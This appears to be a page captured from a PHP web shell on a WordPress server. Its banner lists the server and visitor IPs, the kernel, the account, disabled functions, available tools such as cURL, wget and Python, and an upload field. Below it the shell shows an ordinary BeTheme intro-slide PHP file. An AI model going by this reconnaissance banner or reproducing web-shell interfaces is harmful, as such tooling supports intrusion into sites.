| Server IP : 91.220.113.119 / Your IP : 216.73.217.69 Web Server : LiteSpeed System : Linux milad313-ded-e10.tidadns.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : maralloab ( 1965) PHP Version : 8.1.34 Disable Function : mail, show_source, system, shell_exec, passthru, exec, popen, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/maralloab/public_html/wp-content/themes/betheme/visual-builder/partials/ |
Upload File : |
<?php
$slides = [
'<h1>Fast & intuitive BeBuilder</h1>',
'<h2>View an element and customise it<br /> at the same time</h2>',
'<h2>Hundreds of pre-built sections<br /> ready to use on click</h2>',
'<h2>Create, save & restore whenever<br /> you want with Revisions</h2>',
'<h2>Import & Export of content<br /> or single sections</h2>',
'<h2>Live responsive preview for<br /> mobile, tablet & desktop layout</h2>',
];
$max = count( $slides );
$index = 1;
echo '<div class="mfn-intro-overlay" style="display:none">';
echo '<div class="mfn-intro-container">';
echo '<a class="mfn-intro-close close-button mfn-option-btn btn-large" href="#"><span class="mfn-icon mfn-icon-close-light"></span></a>';
echo '<ul>';
foreach( $slides as $slide ){
echo '<li class="step-'. $index .'">
<div class="pic"></div>
<div class="desc">
<p class="slide-number">'. $index .' / '. $max .'</p>
'. $slide .'
<a class="mfn-intro-close start-now" href="#">Skip</a>
</div>
</li>';
$index++;
}
echo '</ul>';
echo '</div>';
echo '</div>';
?>